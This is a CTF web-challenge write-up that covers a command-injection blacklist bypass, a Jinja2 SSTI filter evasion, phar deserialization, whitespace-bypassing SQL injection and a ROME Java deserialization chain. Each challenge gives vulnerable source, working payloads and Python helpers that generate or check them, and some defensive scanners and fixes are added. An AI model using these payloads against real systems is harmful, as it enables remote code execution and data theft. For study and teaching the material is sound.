Web challenges
RCE
Source:
<?php
error_reporting(0);
if(isset($_GET["cmd"])){
    // Blacklist (case-insensitive): the usual file readers (cat, tac, head, tail, more, less, nl, vi),
    // the substrings "et" (kills get/set), "fl" (kills flag), "sh", "env", "base",
    // and the shell metacharacters | ; ^ ' ] " < > ` / space \ *
    if(preg_match('/et|echo|cat|tac|base|sh|more|less|tail|vi|head|nl|env|fl|\||;|\^|\'|\]|"|<|>|`|\/| |\\\\|\*/i',$_GET["cmd"])){
        echo "Don't Hack Me";
    }else{
        system($_GET["cmd"]);   // whatever survives the blacklist is handed to the shell unchanged
    }
}else{
    show_source(__FILE__);
}
Payload:
cmd=cd%09..%26%26cd%09..%26%26cd%09..%26%26c$2at%09ffff?lllaaaaggggg
How it gets past the blacklist: %09 is a tab, which the shell accepts as a word separator while the regex only forbids a literal space; %26%26 is &&, which is not filtered even though ; and | are; cd .. three times walks up to the filesystem root without writing a /; c$2at expands to cat because $2 is an unset positional parameter that expands to nothing, so the keyword never appears literally in the request; and ? is a single-character wildcard (* is filtered) that also keeps the forbidden substring "fl" out of the file name.
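The filter is easy to misjudge by eye, so the following is an added checker (not part of the writeup) that ports the preg_match() blacklist to Python, reports which token rejects each candidate command, and asks a real POSIX shell what c$2at expands to. The candidate commands are constructed for the demonstration; the last one is the writeup's payload URL-decoded as PHP would see it in $_GET["cmd"].

```python
import re
import subprocess
from urllib.parse import unquote

# The challenge's preg_match() blacklist ported to Python. In PHP's single-quoted
# source, '\\\\' reaches the regex engine as \\ (one literal backslash) and \' as
# a plain quote; the /i modifier becomes re.I.
BLACKLIST = re.compile(
    r"""et|echo|cat|tac|base|sh|more|less|tail|vi|head|nl|env|fl"""
    r"""|\||;|\^|'|\]|"|<|>|`|/| |\\|\*""",
    re.I,
)

def blocked_token(cmd: str):
    """First blacklisted substring in cmd, or None when the command would reach system()."""
    m = BLACKLIST.search(cmd)
    return m.group(0) if m else None

def shell_expand(word: str) -> str:
    """What a POSIX shell makes of a word. Under `sh -c` with no extra arguments the
    positional parameter $2 is unset, so it expands to nothing and merely splits
    the keyword the regex is looking for."""
    return subprocess.run(["sh", "-c", 'printf "%s" ' + word],
                          capture_output=True, text=True, check=True).stdout

# Constructed candidates: a few obvious attempts and the writeup's payload, URL-decoded
# exactly as PHP sees it in $_GET["cmd"].
CANDIDATES = {
    "naive":      "cat /flag",
    "tab":        "cat\t/flag",
    "no-slash":   "cd\t..&&cat\tflag",
    "split-only": "cd\t..&&c$2at\tflag",
    "writeup":    unquote("cd%09..%26%26cd%09..%26%26cd%09..%26%26c$2at%09ffff?lllaaaaggggg"),
}

def audit() -> dict:
    """Which token stops each candidate (None = it passes)."""
    return {name: blocked_token(cmd) for name, cmd in CANDIDATES.items()}

if __name__ == "__main__":
    for name, tok in audit().items():
        print(f"{name:10s} {'passes' if tok is None else 'blocked by ' + repr(tok)}")
    print("c$2at expands to", repr(shell_expand("c$2at")))
```

The "split-only" candidate shows why the wildcard is needed: once cat is split with $2 the next thing the regex trips on is the "fl" of flag, which is what ffff?lll... avoids.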
BabySSTI_Two
Source:
from flask import Flask, request
from jinja2 import Template
import re

app = Flask(__name__)

@app.route("/")
def index():
    name = request.args.get('name', 'CTFer')
    # Blocklist: the usual Python introspection names, the double quote, +, a literal space, "attr" and ~
    if not re.findall('class|init|mro|subclasses|flag|cat|env|"|eval|system|popen|globals|builtins|\+| |attr|\~', name):
        # name is concatenated into the template source instead of being passed to render(): classic SSTI
        t = Template("<body bgcolor=#6B6882><br><p><b><font color='white' size=6px><center>Welcome to NewStarCTF Again, Dear " + name + "</font></center></b></p><br><hr><br><font color='white' size=6px><center>Try to GET me a NAME</center></font><!--This is Hint: Waf Has Been Updated, More Safe!--></body>")
        return t.render()
    else:
        t = Template("Get Out!Hacker!")
        return t.render()

if __name__ == "__main__":
    app.run()
Payload:
?name={{[]['\x5f\x5fc\x6cass\x5f\x5f']['\x5f\x5fbase\x5f\x5f']['\x5f\x5fsubc\x6casses\x5f\x5f']()[199]['\x5f\x5f\x69nit\x5f\x5f']['\x5f\x5fg\x6cobals\x5f\x5f']['\x5f\x5fbu\x69ltins\x5f\x5f']['\x5f\x5fimport\x5f\x5f']('os')['p\x6fpen']('tac%09/f*').read()}}
Why it works: Jinja2 decodes \xNN escapes inside string literals, so '\x5f\x5fc\x6cass\x5f\x5f' is __class__ at render time while the word "class" never appears in the request; the same trick hides init, subclasses, globals, builtins and popen. Attributes are reached with ['...'] subscripts (Jinja2 falls back to getattr when item lookup fails), which avoids both dotted access to a blocked name and the filtered word "attr". The chain is: empty list -> its class -> object -> object.__subclasses__() -> the class at index 199 -> that class's __init__.__globals__['__builtins__']['__import__']('os').popen(...).read(). The command uses %09 (tab) instead of a space and tac /f* instead of cat /flag, because "cat", "flag" and the space are all blocked. The index 199 is specific to the challenge's Python build: the order of __subclasses__() changes between versions and with what has been imported, so it has to be determined for the target rather than copied.
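The payload above is hand-typed, which is error-prone. The following added helper (not part of the writeup or the challenge) generates the same chain from the blocklist, checks the result against the app's exact re.findall() filter without needing Jinja2, and looks up the __subclasses__() index of a chosen class in the current interpreter instead of trusting 199. The class name os._wrap_close is only one commonly used choice; any subclass whose __init__ has os in its globals serves.

```python
import os          # imported so that os._wrap_close is present in this interpreter's subclass list
import re

# The challenge's blocklist, exactly as the Flask app applies it with re.findall()
BLOCKLIST = re.compile(r'class|init|mro|subclasses|flag|cat|env|"|eval|system|popen|globals|builtins|\+| |attr|\~')
# Words the gadget chain cannot avoid and therefore has to hide with \xNN escapes
HIDDEN_WORDS = ("class", "init", "mro", "subclasses", "globals", "builtins", "popen", "attr")

def hex_escape_blocked(name: str) -> str:
    """Replace one letter of each blocked word in name with its \\xNN escape.
    Jinja2 applies Python's unicode-escape decoding to string literals, so
    '__c\\x6cass__' is the attribute name __class__ at render time while the
    request never contains the word 'class'."""
    out = name
    for word in HIDDEN_WORDS:
        idx = out.find(word)
        if idx != -1:
            ch = out[idx + 1]
            out = out[:idx + 1] + f"\\x{ord(ch):02x}" + out[idx + 2:]
    return out

def build_payload(index: int, command: str) -> str:
    """The writeup's gadget chain, generated rather than hand-typed. Every attribute
    is reached through ['...'] subscripts (Jinja2 falls back to getattr) and spaces
    in the command become tabs. The command itself must not contain a blocked word
    or a single quote."""
    def item(attr: str) -> str:
        return f"['{hex_escape_blocked(attr)}']"
    chain = "[]" + item("__class__") + item("__base__") + item("__subclasses__") + f"()[{index}]"
    chain += item("__init__") + item("__globals__") + item("__builtins__") + item("__import__")
    chain += "('os')" + item("popen") + f"('{command.replace(' ', chr(9))}').read()"
    return "{{" + chain + "}}"

def passes_filter(payload: str) -> bool:
    """True when the app's re.findall() finds nothing to object to."""
    return not BLOCKLIST.findall(payload)

def subclass_index(qualname: str):
    """Position of module.Class in object.__subclasses__() for this interpreter.
    The writeup's 199 is what the challenge box had; the order changes between
    Python versions and with the set of imported modules, so look it up."""
    for i, cls in enumerate(object.__subclasses__()):
        if f"{cls.__module__}.{cls.__name__}" == qualname:
            return i
    return None

if __name__ == "__main__":
    idx = subclass_index("os._wrap_close")
    payload = build_payload(idx, "tac /f*")
    print("index of os._wrap_close here:", idx)
    print("passes filter:", passes_filter(payload))
    print(payload)
```

On a target you cannot inspect, the index is usually found by rendering {{[]['\x5f\x5fc\x6cass\x5f\x5f']['\x5f\x5fbase\x5f\x5f']['\x5f\x5fsubc\x6casses\x5f\x5f']()}} once and reading the list, which the filter above also permits.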
UnserializeThree
File upload + phar deserialization
Source:
class.php
<?php
highlight_file(__FILE__);
class Evil{
    public $cmd;
    public function __destruct()
    {
        // Blocks > < ? the word php, and a newline (%0a); a carriage return is not blocked
        if(!preg_match("/>|<|\?|php|".urldecode("%0a")."/i",$this->cmd)){
            //Same point ,can you bypass me again?
            eval("#".$this->cmd);   // '#' opens a line comment; PHP ends it at \n, at \r, or at ?>
        }else{
            echo "No!";
        }
    }
}
// Any filesystem function on a phar:// path parses the archive and unserializes its
// metadata, so file_exists() alone is enough to build an Evil object and fire __destruct()
file_exists($_GET['file']);
Payload:
phar.php (generator script; the archive it writes is renamed to a .png so the upload accepts it)
<?php
// Run with phar.readonly disabled, e.g.  php -d phar.readonly=0 phar.php
class Evil{
    public $cmd;
    public function __construct($cmd)
    {
        $this->cmd = $cmd;
    }
}
$phar = new Phar("phar.phar");   // the file name given to new Phar() must end in .phar
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>");
// a leading \r (%0D) terminates the "#" comment in eval("#".$cmd) without using the blacklisted \n
$cmd = urldecode("%0D")."system('cat /*');";
$o = new Evil($cmd);
$phar->setMetadata($o);          // the object is serialized into the manifest's metadata field
$phar->addFromString("test.txt", "test");   // the archive needs at least one entry
$phar->stopBuffering();
rename("phar.phar","phar1.png"); // the phar:// wrapper does not care about the extension
Trigger (file= points at the uploaded copy under the name the server stored it as):
/class.php?file=phar://upload/20d230fcef0fa22a2f771da029c4b9fc.png
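Because the extension is irrelevant to phar://, the upload side has to look inside the file. The following is an added example (not part of the writeup) that builds a phar carrying the writeup's metadata in pure Python and then pulls the serialized metadata back out of any blob that contains a __HALT_COMPILER(); stub, which is the check an upload handler should run. The builder follows the documented phar layout (manifest length, file count, API version, flags, alias, metadata, one entry, SHA-1 signature) but has not been verified against PHP's loader; it exists to produce realistic input for the scanner. The sample and the Evil serialization are constructed here.

```python
import hashlib
import struct
import zlib

# Stub PHP writes for a fresh archive; phar:// only requires __HALT_COMPILER(); to be present
STUB = b"<?php __HALT_COMPILER(); ?>\r\n"

def php_serialize_evil(cmd: str) -> bytes:
    """Hand-rolled serialize() output for an Evil object with the single public
    property $cmd, i.e. what Phar::setMetadata(new Evil($cmd)) stores."""
    c = cmd.encode()
    return b'O:4:"Evil":1:{s:3:"cmd";s:%d:"%s";}' % (len(c), c)

def build_phar(metadata: bytes, filename: bytes = b"test.txt", content: bytes = b"test") -> bytes:
    """Minimal phar: stub, manifest carrying the metadata, one file entry, file data,
    SHA-1 signature. Field layout follows the documented phar format; the result is
    meant to feed the scanner below, not to be loaded by PHP."""
    entry = (struct.pack("<I", len(filename)) + filename
             + struct.pack("<IIII", len(content), 0, len(content), zlib.crc32(content))
             + struct.pack("<II", 0, 0))              # entry flags, entry metadata length
    body = (struct.pack("<I", 1)                       # number of files
            + b"\x00\x11"                              # manifest API version 1.1.0
            + struct.pack("<I", 0x10000)               # archive flags: carries a signature
            + struct.pack("<I", 0)                     # alias length (no alias)
            + struct.pack("<I", len(metadata)) + metadata
            + entry)
    archive = STUB + struct.pack("<I", len(body)) + body + content
    sig = hashlib.sha1(archive).digest() + struct.pack("<I", 2) + b"GBMB"   # 2 = SHA-1
    return archive + sig

def phar_metadata(blob: bytes):
    """Serialized metadata of a phar, or None when the blob has no __HALT_COMPILER();
    stub. The extension and any bytes in front of the stub (a GIF or PNG header) are
    irrelevant, just as they are to PHP."""
    marker = b"__HALT_COMPILER();"
    pos = blob.find(marker)
    if pos < 0:
        return None
    pos += len(marker)
    for tail in (b" ?>\r\n", b" ?>\n", b" ?>", b"\r\n", b"\n"):   # optional stub tail
        if blob.startswith(tail, pos):
            pos += len(tail)
            break
    _manifest_len, _n_files, _api, _flags, alias_len = struct.unpack_from("<IIHII", blob, pos)
    pos += 18 + alias_len
    meta_len, = struct.unpack_from("<I", blob, pos)
    return blob[pos + 4: pos + 4 + meta_len]

def rejects_upload(blob: bytes) -> bool:
    """Upload-side gate: refuse anything whose phar metadata serializes an object."""
    meta = phar_metadata(blob)
    return meta is not None and meta.startswith(b"O:")

# Constructed sample: the writeup's payload. The leading \r ends PHP's '#' line comment
# (only \n is blacklisted), so eval() reaches system().
SAMPLE = build_phar(php_serialize_evil("\rsystem('cat /*');"))

if __name__ == "__main__":
    print(phar_metadata(SAMPLE))
    print("rejected even with a GIF header in front:", rejects_upload(b"GIF89a" + SAMPLE))
```

A magic-byte check on the upload is not enough: the stub may be preceded by an image header, and the scanner above still finds the manifest, which is exactly why PHP does too.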
Another SQL
Space bypass: %0b (vertical tab). MySQL's lexer accepts 0x09, 0x0A, 0x0B, 0x0C, 0x0D and 0x20 as whitespace, so when only the space character is filtered any of the others (or a /**/ comment) separates tokens just as well. The injected SELECT has two columns because the original query does; the subquery is folded into the first one with group_concat.
Payloads:
# table names
name=-1%0bunion%0bselect%0b(select%0bgroup_concat(table_name)%0bfrom%0binformation_schema.tables%0bwhere%0btable_schema=database()),2;
# column names
name=-1%0bunion%0bselect%0b(select%0bgroup_concat(column_name)%0bfrom%0binformation_schema.columns%0bwhere%0btable_name='wfy_comments'),2;
# row contents
-1%0bunion%0bselect%0b(select%0bgroup_concat(id,text,user,name,display)%0bfrom%0bwfy_comments%0blimit%0b0,1),2;
Rome
A straightforward Java deserialization challenge: generate a payload with ysoserial and send it.
Source (decompiled with jadx):
package remo.remo;
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.util.Base64;
import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.ResponseBody;
@Controller
/* loaded from: Remo-0.0.1-SNAPSHOT.jar:BOOT-INF/classes/remo/remo/SerController.class */
public class SerController {
@GetMapping({"/"})
@ResponseBody
public String helloCTF() {
return "Do you like Jvav?";
}
@PostMapping({"/"})
@ResponseBody
public String helloCTF(@RequestParam String EXP) throws IOException, ClassNotFoundException {
if (EXP.equals("")) {
return "Do you know Rome Serializer?";
}
byte[] exp = Base64.getDecoder().decode(EXP);
ByteArrayInputStream bytes = new ByteArrayInputStream(exp);
ObjectInputStream objectInputStream = new ObjectInputStream(bytes);
objectInputStream.readObject(); // attacker-controlled bytes with no ObjectInputFilter: the gadget chain runs here
return "Do You like Jvav?";
}
}
The gadget library on the classpath is ROME (the challenge name and the "Rome Serializer" hint give it away), so ysoserial's ROME payload is the one to use. Base64-encode the generated bytes and then URL-encode that string before sending it as EXP: a raw + in a form body is decoded as a space and = is the key/value separator, so an unencoded payload arrives corrupted.
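The generation step is the usual ysoserial invocation (the jar name depends on the local build), for example java -jar ysoserial.jar ROME 'id' | base64 -w0. What the server should have done with the bytes is the other half of the story, so the following added example (not part of the writeup or the challenge) shows the defender's view: Java writes every class name in plaintext TC_CLASSDESC records, so a deny-list can be checked before ObjectInputStream instantiates anything, and the correct in-JVM form of that check is an ObjectInputFilter. The gadget class set, the regex-based scan (a scan, not a full stream parser), the to_post_param() helper for the encoding note above, and the truncated sample streams are all constructed here; ysoserial's ROME payload really is wrapped in a java.util.HashMap, which is why the outermost class alone is not enough to look at.

```python
import base64
import re
import struct
from urllib.parse import quote

MAGIC = b"\xac\xed\x00\x05"              # STREAM_MAGIC + STREAM_VERSION
TC_OBJECT, TC_CLASSDESC, TC_ENDBLOCKDATA, TC_NULL = 0x73, 0x72, 0x78, 0x70

# Small illustrative deny-list: classes ysoserial's ROME chain serializes, plus the
# TemplatesImpl sink it ends in. A production filter would be an allow-list instead.
GADGET_CLASSES = {
    "com.sun.syndication.feed.impl.ObjectBean",
    "com.sun.syndication.feed.impl.ToStringBean",
    "com.sun.syndication.feed.impl.EqualsBean",
    "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",
}

# TC_CLASSDESC, then a 2-byte big-endian length (<= 256 here), then the class name in
# modified UTF-8. The match is greedy; the length pair says where the name really ends.
CLASSDESC_RE = re.compile(rb"\x72(?P<len>[\x00\x01].)(?P<name>[A-Za-z0-9_$.]{4,256})", re.DOTALL)

def class_names(stream: bytes) -> list:
    """Class names carried by TC_CLASSDESC records anywhere in the stream, nested
    members included. Java writes them in plaintext, so a deny/allow check can run
    before ObjectInputStream.readObject() instantiates anything. This is a scan,
    not a parser: it does not follow back-references or walk object data."""
    if not stream.startswith(MAGIC):
        raise ValueError("not a Java serialization stream")
    names = []
    for m in CLASSDESC_RE.finditer(stream):
        n = struct.unpack(">H", m.group("len"))[0]
        if 0 < n <= len(m.group("name")):
            names.append(m.group("name")[:n].decode())
    return names

def is_known_gadget(stream: bytes) -> bool:
    return any(n in GADGET_CLASSES for n in class_names(stream))

def to_post_param(stream: bytes) -> str:
    """Base64 first, then URL-encode, so +, / and = survive the form body."""
    return quote(base64.b64encode(stream).decode(), safe="")

def _classdesc(name: str) -> bytes:
    """TC_CLASSDESC with no fields for a constructed sample (serialVersionUID is arbitrary)."""
    return (bytes([TC_CLASSDESC]) + struct.pack(">H", len(name)) + name.encode()
            + b"\x00" * 8            # serialVersionUID
            + b"\x02"                # SC_SERIALIZABLE
            + b"\x00\x00"            # field count
            + bytes([TC_ENDBLOCKDATA, TC_NULL]))   # no class annotations, no superclass

# Constructed, truncated streams (real ysoserial output is far longer and carries field
# data); only the descriptor bytes matter to the scan. ysoserial's ROME payload wraps
# the chain in a HashMap, so the outermost class is a JDK one.
ROME_LIKE = (MAGIC + bytes([TC_OBJECT]) + _classdesc("java.util.HashMap")
             + bytes([TC_OBJECT]) + _classdesc("com.sun.syndication.feed.impl.ObjectBean"))
BENIGN = MAGIC + bytes([TC_OBJECT]) + _classdesc("java.util.ArrayList")

if __name__ == "__main__":
    print(class_names(ROME_LIKE), is_known_gadget(ROME_LIKE))
    print(class_names(BENIGN), is_known_gadget(BENIGN))
    print(to_post_param(ROME_LIKE)[:40] + "...")
```

In the controller itself the equivalent fix is one line before readObject(): objectInputStream.setObjectInputFilter(ObjectInputFilter.Config.createFilter("remo.**;java.base/*;!*")), which rejects every class outside the allow-list before any constructor or readObject() method of the stream's objects runs.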